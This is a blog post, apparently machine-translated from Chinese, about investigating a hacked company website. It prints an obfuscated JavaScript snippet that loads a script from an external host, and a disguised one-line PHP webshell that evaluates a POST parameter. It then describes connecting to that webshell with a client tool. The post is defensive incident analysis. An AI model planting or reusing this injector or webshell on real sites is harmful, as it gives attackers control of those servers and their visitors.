Yesterday, the manager came again and said that the company's website was hung up

Since I don't understand infiltration, I can only touch it blindly

See what's in the home page file?

Three terrible labels:

There is also a piece of js code, which is basically found on the hacked website when copied to Baidu, but I don't know what it is

 <script type="text/javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]  ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\ x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); </script>

For hexadecimal code, roughly the result after converting unicode code is:
After a cursory look (clearly, it is clear that the return value of the js file is output on the page).

I also found a bunch of things linked to php files at the bottom of the page

Then I took a look at these PHP files

But I found that these files are identical, only with different names. I took a look at this PHP code, which means reading the contents in the address of Reads passed to the custom method and outputting.

Then I opened the address decisively, but it was discovered after the company's website was hacked for too long that the address was also very unlucky 404

Check through logs

If you know where the web page is black chained, you have to check how the permission is obtained.
First of all, it is impossible to guess the FTP password. All the FTP passwords of the company's websites are randomly generated with mixed uppercase and lowercase numbers.
Then I downloaded all the access logs of the website, but they could not be found because they had been hacked for too long.
Then I thought about going to the background to check the operation log, but I found that the background was written by the seniors of my company, which was not so perfect at all, let alone the operation log.
True, no solution

Security dog to understand?

Since you don't have the ability to check, use software to check where the back door is.
Let's learn about the website security dog: http://free.safedog.cn/website_safedog.html
(@ Remember to pay the advertising fee for the safety dog)

After downloading all the files on the website and scanning them, I found many women.

Since I used to play a simple invasion with a sentence trojan horse before, I clicked the second scanning result randomly, but I really confirmed my eyes!!!

Next, I opened this one sentence trojan file. There are only two lines of code exposed in the whole file, and the rest are all commented out code (even to disguise as a dream CMS file is powerful).

Copy these two pieces of code to Baidu to see what this is?

 $a=range(1,200); $b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);

As expected, it is really a sentence. Baidu later learned that the password of the Trojan is 4.

Well, since we know it's a sentence, let's try some trivial things we met before, plus the legendary Chinese kitchen knife?

Sure enough, I connected and got all the permissions of the website

To be continued

There are too many things to say about penetration. It is still the most important to do a good job in the security protection of the website. You should delete the security loopholes and trojan files found out in a timely manner, so as not to give bad corn a chance!!!
As for the vulnerability of the company's website... emmmmm... still looking for~